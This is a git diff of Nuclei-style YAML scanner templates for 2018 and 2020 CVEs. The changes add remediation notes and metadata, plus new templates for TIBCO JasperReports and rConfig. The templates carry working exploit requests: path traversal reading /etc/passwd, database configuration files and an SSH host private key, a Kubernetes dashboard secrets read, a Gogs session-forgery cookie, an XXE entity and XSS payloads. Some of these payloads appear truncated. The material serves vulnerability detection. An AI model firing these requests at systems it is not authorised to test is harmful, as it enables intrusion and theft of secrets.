CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-18264 cwe-id: CWE-306 + epss-score: 0.97407 + epss-percentile: 0.99902 + cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: kubernetes + product: dashboard shodan-query: product:"Kubernetes" tags: cve,cve2018,kubernetes,k8s,auth-bypass @@ -28,9 +36,9 @@ http: - "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" stop-at-first-match: true + matchers-condition: and matchers: - - type: dsl dsl: - 'contains(body, "apiVersion") && contains(body, "objectRef")' @@ -38,4 +46,5 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/06/13 + +# digest: 490a00463044022058dab79fc574c5513a0a995fd4696ef41c2eb51598a7778f0fac53303f5dfe9302203590985344e85a2c540cd471c46665dc26da94f773b3d28cb2d73ec9d4af7869:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index 76dc33fe75..4bc211b3f7 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Centos Web Panel version 0.9.8.480 suffers from local file inclusion vulnerabilities. Other vulnerabilities including cross-site scripting and remote code execution are also known to impact this version. + remediation: | + Upgrade to a patched version of Centos Web Panel. reference: - https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html - http://centos-webpanel.com/ @@ -16,9 +18,14 @@ info: cvss-score: 7.5 cve-id: CVE-2018-18323 cwe-id: CWE-22 - tags: cve,cve2018,centos,lfi,packetstorm + epss-score: 0.97175 + epss-percentile: 0.9974 + cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: control-webpanel + product: webpanel + tags: cve,cve2018,centos,lfi,packetstorm http: - method: GET @@ -27,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -36,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/17 +# digest: 4a0a0047304502207ae285f7305c8e85c2ba7584506d66b37b15e8df943ec0226998ba3abd7d6301022100d447b81baa45764d76a7077d59068d4ffb45e502ef24e918e3feff6953baff16:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 23eff8504c..5194c4baed 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -5,6 +5,8 @@ info: author: emadshanab severity: medium description: Planon before Live Build 41 is vulnerable to cross-site scripting. + remediation: | + Apply the latest patch or upgrade to a non-vulnerable version of Planon Live Build. reference: - https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2018-18570 @@ -13,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18570 cwe-id: CWE-79 - tags: xss,cve,cve2018,planon + epss-score: 0.00098 + epss-percentile: 0.40462 + cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: planonsoftware + product: planon + tags: xss,cve,cve2018,planon http: - method: GET @@ -24,18 +31,18 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/08/18 +# digest: 490a00463044022054fdc7ccb1fa40acf27c928ec43774e8c1cdb68dec58df4ccfa7f33371546cbf02204437a51930405c798d71eb1f605a7e978f5d41bd8135beadbf0a6dbe2ba73839:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index 5924c006a9..aa898d7a2f 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. + remediation: | + Upgrade to the latest version of DedeCMS or apply the official patch provided by the vendor to fix the XSS vulnerability. reference: - https://github.com/ky-j/dedecms/issues/8 - https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx @@ -15,10 +17,15 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18608 cwe-id: CWE-79 + epss-score: 0.00177 + epss-percentile: 0.54723 + cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"DedeCms" verified: true + max-request: 1 + vendor: dedecms + product: dedecms + shodan-query: http.html:"DedeCms" tags: dedecms,xss,cve,cve2018 http: @@ -44,4 +51,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 +# digest: 490a0046304402203c39ade3b6b45e8dddfc86610579f57318d021d22aa732bf44d23808305a8a5202207654f932f3a3a9ba9d8f81b81e722614bf45ba60e6a27ec71d22ff2e54376e9c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 9916fc8c86..979c15fd47 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Microstrategy Web 7 does not sufficiently encode user-controlled inputs, resulting in cross-site scripting via the Login.asp Msg parameter. + remediation: | + Apply the latest security patches or updates provided by Microstrategy to fix the XSS vulnerability in the Web 7 application. reference: - https://www.exploit-db.com/exploits/45755 - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html @@ -14,28 +16,34 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18775 cwe-id: CWE-79 - tags: cve2018,microstrategy,xss,edb,packetstorm,cve + epss-score: 0.00223 + epss-percentile: 0.6042 + cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: microstrategy + product: microstrategy_web + tags: cve2018,microstrategy,xss,edb,packetstorm,cve,intrusive http: - method: GET path: - - '{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C' + - "{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C" + matchers-condition: and matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: header + words: + - text/html + - type: status status: - 200 - - type: word - words: - - '">' - part: body - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/07/22 +# digest: 4b0a00483046022100f263eb166957ba331dd2a0136e34fcbe133a7a5922d4900f4b477ae7daa1059e022100e6e6589ac5f01a75fdaa313322770c4dbe4d06b43a3b9a698509021e276a9448:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index 0f5f7c579f..fe97600436 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Microstrategy Web 7 is vulnerable to local file inclusion via "/WebMstr7/servlet/mstrWeb" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. + remediation: | + Apply the latest security patches or upgrade to a newer version of Microstrategy Web. reference: - https://www.exploit-db.com/exploits/45755 - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html @@ -15,9 +17,14 @@ info: cvss-score: 4.3 cve-id: CVE-2018-18777 cwe-id: CWE-22 - tags: traversal,edb,packetstorm,cve,cve2018,microstrategy,lfi + epss-score: 0.00224 + epss-percentile: 0.60518 + cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: microstrategy + product: microstrategy_web + tags: traversal,edb,packetstorm,cve,cve2018,microstrategy,lfi http: - method: GET @@ -26,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/22 +# digest: 4a0a0047304502206f0a6a393ac224e24a05642a9e6c016c03d01a0fe4eb5e53fd2f3f3bfa7fab580221009a7084474cd05192ce262ab56a36d48e19c5ddbddf58995de103e9fcc33bf426:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 788b5f4473..20a1ad0251 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: ACME mini_httpd before 1.30 is vulnerable to local file inclusion. + remediation: | + Upgrade ACME mini_httpd to version 1.30 or later to mitigate this vulnerability. reference: - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ - http://www.acme.com/software/mini_httpd/ @@ -14,9 +16,14 @@ info: cvss-score: 6.5 cve-id: CVE-2018-18778 cwe-id: CWE-200 - tags: cve,cve2018,lfi,mini_httpd + epss-score: 0.95125 + epss-percentile: 0.99085 + cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: acme + product: mini-httpd + tags: cve,cve2018,lfi,mini_httpd http: - raw: @@ -25,14 +32,15 @@ http: Host: unsafe: true + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/07/22 + - type: status + status: + - 200 + +# digest: 490a0046304402207494905874dc3a1d89084bfed696edbe216c2ceb223be6817b5e34e06594ab690220077324d3a1d9b876c022ead8f55dd1d98041a3d3153ae6df97560dfd77e4b14e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml new file mode 100644 index 0000000000..6a2e16e683 --- /dev/null +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -0,0 +1,51 @@ +id: CVE-2018-18809 + +info: + name: TIBCO JasperReports Library - Directory Traversal + author: DhiyaneshDK + severity: medium + description: | + The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system. + remediation: | + Apply the latest security patches or upgrade to a patched version of TIBCO JasperReports Library. + reference: + - https://packetstormsecurity.com/files/154406/Tibco-JasperSoft-Path-Traversal.html + - https://security.elarlang.eu/cve-2018-18809-path-traversal-in-tibco-jaspersoft.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-18809 + - http://packetstormsecurity.com/files/154406/Tibco-JasperSoft-Path-Traversal.html + - http://seclists.org/fulldisclosure/2019/Sep/17 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2018-18809 + cwe-id: CWE-22 + epss-score: 0.46465 + epss-percentile: 0.97048 + cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:* + metadata: + verified: true + max-request: 1 + vendor: tibco + product: jasperreports_library + shodan-query: html:"jasperserver-pro" + tags: packetstorm,seclists,cve,cve2018,lfi,kev,jasperserver,jasperreport + +http: + - method: GET + path: + - "{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "metadata.jdbc.driverClassName" + - "metadata.hibernate.dialect" + condition: and + + - type: status + status: + - 200 + +# digest: 490a0046304402207ddb116106d887cc1e4ccf0af68588a24ed75c46f157d931f6eb8e2a83981351022010a073ec07b71e03c9f51270700781126ab5f02e2bd253db3f1e00376ec8e44e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index c8cdae0248..0e0b113e63 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -5,20 +5,25 @@ info: author: princechaddha severity: critical description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron. + remediation: This issue will be fixed by updating to the latest version of Gogs. reference: - https://www.anquanke.com/post/id/163575 - https://github.com/vulhub/vulhub/tree/master/gogs/CVE-2018-18925 - https://nvd.nist.gov/vuln/detail/cve-2018-18925 - https://github.com/gogs/gogs/issues/5469 - remediation: This issue will be fixed by updating to the latest version of Gogs. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-18925 cwe-id: CWE-384 - tags: gogs,lfi,rce,vulhub,cve,cve2018 + epss-score: 0.09538 + epss-percentile: 0.94106 + cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: gogs + product: gogs + tags: gogs,lfi,rce,vulhub,cve,cve2018 http: - raw: @@ -26,7 +31,6 @@ http: GET / HTTP/1.1 Host: {{Hostname}} Cookie: lang=en-US; i_like_gogits=../../../../etc/passwd; - - | GET / HTTP/1.1 Host: {{Hostname}} @@ -38,4 +42,4 @@ http: dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "")' -# Enhanced by mp on 2022/05/13 +# digest: 4b0a00483046022100c64dbc68144b657d73446ff90ea4bdd092468a1e0a33afcc386489ad7c05df460221008162f941a129d797a9b04d23c182ac0b161379e72b84360a6acace9a09e6851a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index 99f4cd5a9b..b2757844b3 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 is vulnerable to reflected cross-site scripting via assets/edit/registrar-account.php. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/45883/ - https://github.com/domainmod/domainmod/issues/79 @@ -15,9 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19136 cwe-id: CWE-79 + epss-score: 0.00151 + epss-percentile: 0.51141 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: domainmod + product: domainmod tags: edb,cve,cve2018,domainmod,xss,authenticated http: @@ -28,12 +35,12 @@ http: Content-Type: application/x-www-form-urlencoded new_username={{username}}&new_password={{password}} - - | GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -50,4 +57,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 +# digest: 4a0a00473045022100fb8c1c344f5163082ee0c2c5f74f5a75045dd5872000d3d65b882fbf8485012a02203769bdb8fdb4ef776224089d9ce3afe71d8b85e01828cbce9b2437035586192f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 75b7fd4247..83fa3e65e9 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://github.com/domainmod/domainmod/issues/79 - https://nvd.nist.gov/vuln/detail/CVE-2018-19137 @@ -14,9 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19137 cwe-id: CWE-79 + epss-score: 0.0008 + epss-percentile: 0.33745 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: domainmod + product: domainmod tags: cve,cve2018,domainmod,xss,authenticated http: @@ -27,12 +34,12 @@ http: Content-Type: application/x-www-form-urlencoded new_username={{username}}&new_password={{password}} - - | GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -49,4 +56,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 +# digest: 4a0a00473045022100f6f4494aa2a8a028a48f80364028baae338609a666b0cd6699a5b953cae32bdf02205dd56e229311bbeed3eea53caa0568d975cd2a7eda8fec15c1cfd22523428e36:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 119c37063e..bfbf295191 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -6,19 +6,28 @@ info: severity: medium description: | WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version of the Ninja Forms plugin (3.3.18 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/fb036dc2-0ee8-4a3e-afac-f52050b3f8c7 - https://wordpress.org/plugins/ninja-forms/ - https://www.exploit-db.com/exploits/45880 - https://nvd.nist.gov/vuln/detail/CVE-2018-19287 + - https://plugins.trac.wordpress.org/changeset/1974335/ninja-forms/trunk/includes/Admin/Menus/Submissions.php classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-19287 cwe-id: CWE-79 + epss-score: 0.64483 + epss-percentile: 0.97512 + cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: ninjaforma + product: ninja_forms + framework: wordpress tags: wp-plugin,wp,xss,authenticated,wpscan,edb,cve,cve2018,ninja-forms,wordpress http: @@ -29,13 +38,13 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date="> ]> @@ -36,9 +38,11 @@ http: &ent; + headers: + Content-Type: "text/xml" + matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -47,4 +51,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/05 +# digest: 4a0a00473045022100b7ff3875b8967c6d9929f701bf2669ba7883f882413a556728bd108be10f562c022054aa64efc74472196c61ff51739300af3555479a084cb830e4a11f0757c8ce2f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 99e6f5ca3d..e270f0b197 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO. + remediation: | + Update to the latest version of WordPress Catch Breadcrumb plugin (1.5.4 or higher) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 - https://wpvulndb.com/vulnerabilities/10184 @@ -16,11 +18,15 @@ info: cvss-score: 6.1 cve-id: CVE-2020-12054 cwe-id: CWE-79 - cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:*:*:* epss-score: 0.00129 - tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020 + epss-percentile: 0.47363 + cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: catchplugins + product: catch_breadcrumb + framework: wordpress + tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020 http: - method: GET @@ -30,10 +36,10 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - "catch-breadcrumb" - part: body condition: and - type: word @@ -45,4 +51,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/02 +# digest: 4b0a00483046022100e03f8acdcb2fa48ea39b253c3f2f59393c8d33c0cc06640e28b270e5293732500221008961c2223348e17c79dba248c45eb9396c22e97fc5bd74fe54ae1a945dab2212:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml index 7459250ff9..d8f9182e22 100644 --- a/http/cves/2020/CVE-2020-12116.yaml +++ b/http/cves/2020/CVE-2020-12116.yaml @@ -5,20 +5,26 @@ info: author: dwisiswant0 severity: high description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request. + remediation: | + Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine OpManger to mitigate the vulnerability. reference: - https://github.com/BeetleChunks/CVE-2020-12116 - https://nvd.nist.gov/vuln/detail/CVE-2020-12116 - https://www.manageengine.com/network-monitoring/help/read-me-complete.html + - https://www.manageengine.com/network-monitoring/help/read-me-complete.html#125125 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-12116 cwe-id: CWE-22 + epss-score: 0.97317 + epss-percentile: 0.99839 cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:* - epss-score: 0.97327 - tags: cve,cve2020,zoho,lfi,manageengine metadata: max-request: 2 + vendor: zohocorp + product: manageengine_opmanager + tags: cve,cve2020,zoho,lfi,manageengine http: - raw: @@ -27,7 +33,6 @@ http: Host: {{Hostname}} Accept: */* Connection: close - - | GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1 Host: {{Hostname}} @@ -36,14 +41,6 @@ http: Connection: close Referer: http://{{Hostname}} - extractors: - - type: regex - name: endpoint - part: body - internal: true - regex: - - "(?m)/cachestart/.*/jquery/" - req-condition: true matchers: - type: dsl @@ -52,4 +49,12 @@ http: - 'status_code_2 == 200' condition: and -# Enhanced by mp on 2022/05/04 + extractors: + - type: regex + name: endpoint + regex: + - "(?m)/cachestart/.*/jquery/" + internal: true + part: body + +# digest: 4a0a00473045022100e44d30641363c22053dd5b26e6935e16c22f0b0a4cfc9872d979de1a53576650022079434b03b463790e1fe312c99c0702a9b27786ee1090c0bda410cb2a1fab6cda:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index 77411546a8..c2e7627fcd 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication. + remediation: | + Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://cerne.xyz/bugs/CVE-2020-12127 - https://www.wavlink.com/en_us/product/WL-WN530H4.html @@ -15,11 +17,15 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12127 cwe-id: CWE-306 - epss-score: 0.0509 + epss-score: 0.03579 + epss-percentile: 0.90577 + cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Wavlink" verified: true + max-request: 1 + vendor: wavlink + product: wn530h4_firmware + shodan-query: http.html:"Wavlink" tags: cve,cve2020,wavlink,exposure http: @@ -42,4 +48,4 @@ http: status: - 200 -# Enhanced by md on 2023/02/01 +# digest: 490a004630440220604697ed1f0e9354b7a20a3d509bb9f5a62589d88a262a24418d8a94240baebc0220350698ebd6e600a031cc77351f01c1b87cb36bb23c2914a71f919ee24f9d709f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml new file mode 100644 index 0000000000..a902f2649c --- /dev/null +++ b/http/cves/2020/CVE-2020-12256.yaml @@ -0,0 +1,54 @@ +id: CVE-2020-12256 + +info: + name: rConfig 3.9.4 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8 + - https://nvd.nist.gov/vuln/detail/CVE-2020-12256 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-12256 + cwe-id: CWE-79 + epss-score: 0.17512 + epss-percentile: 0.95533 + cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* + metadata: + verified: "true" + max-request: 3 + vendor: rconfig + product: rconfig + shodan-query: http.title:"rConfig" + tags: cve,cve2020,rconfig,authenticated,xss + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + - | + GET /devicemgmt.php?deviceId="> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' + - 'contains(content_type_3, "text/html")' + condition: and + +# digest: 4b0a00483046022100ed240e9cb0fd6ed3c9de5de12b12932ea4c52a88500bc139e266ef3d06fd7a5e022100f83e2bd37382c2fec3d0293d92a6e1631c0e18b4884dd7312c74925f501e22bf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-12259.yaml b/http/cves/2020/CVE-2020-12259.yaml new file mode 100644 index 0000000000..db53e3660f --- /dev/null +++ b/http/cves/2020/CVE-2020-12259.yaml @@ -0,0 +1,54 @@ +id: CVE-2020-12259 + +info: + name: rConfig 3.9.4 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8 + - https://nvd.nist.gov/vuln/detail/CVE-2020-12259 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-12259 + cwe-id: CWE-79 + epss-score: 0.16256 + epss-percentile: 0.95391 + cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* + metadata: + verified: "true" + max-request: 3 + vendor: rconfig + product: rconfig + shodan-query: http.title:"rConfig" + tags: cve,cve2020,rconfig,authenticated,xss + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + - | + GET /configDevice.php?rid="> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' + - 'contains(content_type_3, "text/html")' + condition: and + +# digest: 